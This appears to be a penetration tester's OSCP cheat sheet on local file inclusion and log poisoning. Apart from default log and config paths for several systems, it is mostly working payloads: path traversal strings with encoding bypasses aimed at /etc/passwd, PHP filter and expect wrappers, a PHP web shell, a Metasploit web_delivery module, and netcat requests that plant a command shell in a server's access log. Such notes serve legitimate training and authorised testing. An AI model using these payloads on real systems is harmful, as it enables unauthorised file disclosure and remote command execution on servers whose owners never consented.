1-all-of-weblog-lfi-rfl - My-oscp-all-things

[Local File Inclusion · pentestbook](https://chryzsh.gitbooks.io/pentestbook/content/local_file_inclusion.html) ### diffentent-os log file default location #### Debian / Ubuntu Linux Apache ``` /var/log/apache2/access.log /var/log/apache2/error.log /var/log/nginx/access.log /var/log/nginx/error.log ``` #### RHEL / Red Hat / CentOS / Fedora Linux Apache ``` /var/log/httpd/access.log /var/log/httpd/error.log /var/log/nginx/access.log ``` #### FreeBSD Apache ``` /var/log/httpd-error.log /var/log/httpd-access.log ``` #### else ``` /www/log/access_log /log/access_log /logs/access_log ``` ### find location ``` /etc/apache2/envvars ``` ### 各类常用伪协议/包装器 ``` ' and die(show_source('/etc/passwd')) or ' ../../../etc/passwd ../../../etc/passwd%00 ../../../etc/passwd%2500 %252e%252e%252fetc%252fpasswd %252e%252e%252fetc%252fpasswd%00 ....//....//etc/passwd ..///////..////..//////etc/passwd /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/./passwd php://filter/read=string.rot13/resource=index.php php://filter/convert.base64-encode/resource=index.php pHp://FilTer/convert.base64-encode/resource=index.php php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd expect://ls ``` #### ex ``` php://input&cmd=ls <?php echo shell_exec($_GET['cmd']);?> ``` ### msf module ``` use exploit/multi/script/web_delivery ``` ### centos ``` apache /var/log/httpd/access_log /var/log/httpd/error_log ftp /var/log/proftpd /var/log/xferlog /var/log/xferlog.log /etc/vsftpd/vsftpd.conf ssh /var/log/secure ``` ### main ``` /etc/apache2/httpd.conf /etc/apache2/apache2.conf /etc/httpd/httpd.conf /etc/httpd/conf/httpd.conf ``` ### windows ``` C:\xampp\apache\logs\access.log ``` ### attack to wirte a cmd-shell nc solstice.vhost 80 GET <?php system($_GET['cmd']); ?> HTTP/1.1 nc solstice.vhost 80 GET <?php passthru($_GET['cmd']); ?> HTTP/1.1 ### reference [Local File Inclusion (LFI) — Web Application Penetration Testing | by Aptive | Medium](https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601)